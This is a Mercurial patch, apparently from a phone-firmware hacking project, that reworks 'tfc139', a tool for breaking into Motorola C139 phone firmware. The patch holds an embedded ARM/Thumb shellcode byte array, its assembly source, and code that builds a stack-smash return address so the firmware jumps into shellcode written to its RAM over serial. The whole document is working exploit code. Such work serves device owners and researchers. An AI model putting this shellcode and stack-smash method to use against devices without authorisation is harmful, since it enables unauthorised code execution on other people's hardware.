# HG changeset patch
# User Mychaela Falconia <falcon@ivan.Harhan.ORG>
# Date 1449734867 0
# Node ID 7166c8311b0d1fc696ec4f1a19465366e59fdb6a
# Parent  461f7ee5f2544d189a218c85935d0e932d0b19c7
tfc139 reworked to support both ARM and Thumb entry

diff -r 461f7ee5f254 -r 7166c8311b0d rvinterf/lowlevel/tfc139.c
--- a/rvinterf/lowlevel/tfc139.c	Thu Dec 10 05:35:42 2015 +0000
+++ b/rvinterf/lowlevel/tfc139.c	Thu Dec 10 08:07:47 2015 +0000
@@ -27,28 +27,30 @@
 time_t logtime;
 int no_output;	/* for output.c */
 
-int wakeup_after_sec = 7;
+int wakeup_after_sec = 1;
 
 /* see ../../target-utils/tf-breakin/payload.S for the source */
-static u_char iram_payload[112] = {
-	0xD3, 0xF0, 0x21, 0xE3, 0x58, 0x10, 0x9F, 0xE5,
-	0xF5, 0x00, 0xA0, 0xE3, 0xB2, 0x00, 0xC1, 0xE1,
-	0xA0, 0x00, 0xA0, 0xE3, 0xB2, 0x00, 0xC1, 0xE1,
-	0x48, 0x60, 0x9F, 0xE5, 0x05, 0x00, 0xD6, 0xE5,
-	0x20, 0x00, 0x10, 0xE3, 0xFC, 0xFF, 0xFF, 0x0A,
-	0x2C, 0x10, 0x8F, 0xE2, 0x06, 0x20, 0xA0, 0xE3,
-	0x01, 0x00, 0xD1, 0xE4, 0x00, 0x00, 0xC6, 0xE5,
-	0x01, 0x20, 0x52, 0xE2, 0xFB, 0xFF, 0xFF, 0x1A,
-	0x05, 0x00, 0xD6, 0xE5, 0x40, 0x00, 0x10, 0xE3,
-	0xFC, 0xFF, 0xFF, 0x0A, 0x18, 0x10, 0x9F, 0xE5,
-	0x01, 0x2C, 0xA0, 0xE3, 0xB0, 0x20, 0xC1, 0xE1,
-	0x00, 0xF0, 0xA0, 0xE3, 0x02, 0x02, 0x02, 0x4F,
-	0x4B, 0x02, 0x00, 0x00, 0x02, 0xF8, 0xFF, 0xFF,
-	0x00, 0x58, 0xFF, 0xFF, 0x10, 0xFB, 0xFF, 0xFF
+static u_char shellcode[114] = {
+	0x78, 0x47, 0xC0, 0x46, 0xD3, 0xF0, 0x21, 0xE3,
+	0x50, 0x10, 0x9F, 0xE5, 0xF5, 0x00, 0xA0, 0xE3,
+	0xB2, 0x00, 0xC1, 0xE1, 0xA0, 0x00, 0xA0, 0xE3,
+	0xB2, 0x00, 0xC1, 0xE1, 0x40, 0x60, 0x9F, 0xE5,
+	0x05, 0x00, 0xD6, 0xE5, 0x20, 0x00, 0x10, 0xE3,
+	0xFC, 0xFF, 0xFF, 0x0A, 0x38, 0x10, 0x8F, 0xE2,
+	0x06, 0x20, 0xA0, 0xE3, 0x01, 0x00, 0xD1, 0xE4,
+	0x00, 0x00, 0xC6, 0xE5, 0x01, 0x20, 0x52, 0xE2,
+	0xFB, 0xFF, 0xFF, 0x1A, 0x05, 0x00, 0xD6, 0xE5,
+	0x40, 0x00, 0x10, 0xE3, 0xFC, 0xFF, 0xFF, 0x0A,
+	0x10, 0x10, 0x9F, 0xE5, 0x01, 0x2C, 0xA0, 0xE3,
+	0xB0, 0x20, 0xC1, 0xE1, 0x00, 0xF0, 0xA0, 0xE3,
+	0x02, 0xF8, 0xFF, 0xFF, 0x00, 0x58, 0xFF, 0xFF,
+	0x10, 0xFB, 0xFF, 0xFF, 0x02, 0x02, 0x02, 0x4F,
+	0x4B, 0x02
 };
 
-static unsigned iram_load_addr = 0x800000;
+static unsigned shellcode_load_addr = 0x800000;
 static unsigned stack_smash_addr = 0x837C54;
+static int thumb_entry = 0;
 
 static u_char stack_smash_payload[4];
 
@@ -77,6 +79,22 @@
 	send_pkt_to_target(pkt, i + 1);
 }
 
+static void
+build_stack_smash_payload()
+{
+	unsigned jump_addr;
+
+	jump_addr = shellcode_load_addr;
+	if (thumb_entry)
+		jump_addr += 1;
+	else
+		jump_addr += 4;
+	stack_smash_payload[0] = jump_addr;
+	stack_smash_payload[1] = jump_addr >> 8;
+	stack_smash_payload[2] = jump_addr >> 16;
+	stack_smash_payload[3] = jump_addr >> 24;
+}
+
 main(argc, argv)
 	char **argv;
 {
@@ -86,10 +104,10 @@
 	fd_set fds;
 
 	baudrate_name = "57600";	/* what C139 firmware uses */
-	while ((c = getopt(argc, argv, "a:B:l:s:w:")) != EOF)
+	while ((c = getopt(argc, argv, "a:B:l:s:tw:")) != EOF)
 		switch (c) {
 		case 'a':
-			iram_load_addr = strtoul(optarg, 0, 16);
+			shellcode_load_addr = strtoul(optarg, 0, 16);
 			continue;
 		case 'B':
 			baudrate_name = optarg;
@@ -100,6 +118,9 @@
 		case 's':
 			stack_smash_addr = strtoul(optarg, 0, 16);
 			continue;
+		case 't':
+			thumb_entry = 1;
+			continue;
 		case 'w':
 			wakeup_after_sec = strtoul(optarg, 0, 0);
 			continue;
@@ -126,12 +147,9 @@
 		fprintf(logF, "*** Log of TFC139 break-in session ***\n");
 	}
 	time(&logtime);
-	output_line("Sending IRAM payload");
-	send_compal_memwrite(iram_load_addr, iram_payload, sizeof iram_payload);
-	stack_smash_payload[0] = iram_load_addr;
-	stack_smash_payload[1] = iram_load_addr >> 8;
-	stack_smash_payload[2] = iram_load_addr >> 16;
-	stack_smash_payload[3] = iram_load_addr >> 24;
+	output_line("Sending shellcode RAM write");
+	send_compal_memwrite(shellcode_load_addr, shellcode, sizeof shellcode);
+	build_stack_smash_payload();
 	for (;;) {
 		FD_ZERO(&fds);
 		FD_SET(target_fd, &fds);
diff -r 461f7ee5f254 -r 7166c8311b0d target-utils/tf-breakin/mkembed.c
--- a/target-utils/tf-breakin/mkembed.c	Thu Dec 10 05:35:42 2015 +0000
+++ b/target-utils/tf-breakin/mkembed.c	Thu Dec 10 08:07:47 2015 +0000
@@ -5,7 +5,7 @@
 #include <stdlib.h>
 #include <unistd.h>
 
-#define	PAYLOAD_SIZE	112
+#define	PAYLOAD_SIZE	116
 u_char payload_buf[PAYLOAD_SIZE];
 
 read_binary(filename)
@@ -46,15 +46,17 @@
 		perror(filename);
 		exit(1);
 	}
-	fprintf(of, "u_char payload[%d] = {\n", PAYLOAD_SIZE);
+	fprintf(of, "u_char shellcode[%d] = {\n", PAYLOAD_SIZE);
 	idx = 0;
-	for (i = 0; i < 14; i++) {
+	for (i = 0; i < 15; i++) {
 		for (j = 0; j < 8; j++) {
 			if (j)
 				putc(' ', of);
 			else
 				putc('\t', of);
 			fprintf(of, "0x%02X,", payload_buf[idx++]);
+			if (idx >= PAYLOAD_SIZE)
+				break;
 		}
 		putc('\n', of);
 	}
diff -r 461f7ee5f254 -r 7166c8311b0d target-utils/tf-breakin/payload.S
--- a/target-utils/tf-breakin/payload.S	Thu Dec 10 05:35:42 2015 +0000
+++ b/target-utils/tf-breakin/payload.S	Thu Dec 10 08:07:47 2015 +0000
@@ -1,5 +1,11 @@
 	.text
 	.org	0
+
+@ allow entry in Thumb state
+	.code	16
+	bx	pc
+	nop
+
 	.code	32
 
 @ set CPSR like mot931c payload does
@@ -33,5 +39,5 @@
 	strh	r2, [r1]
 @ jump to it!
 	mov	pc, #0
-
+	.ltorg
 outstr:	.byte	2,2,2,'O','K',2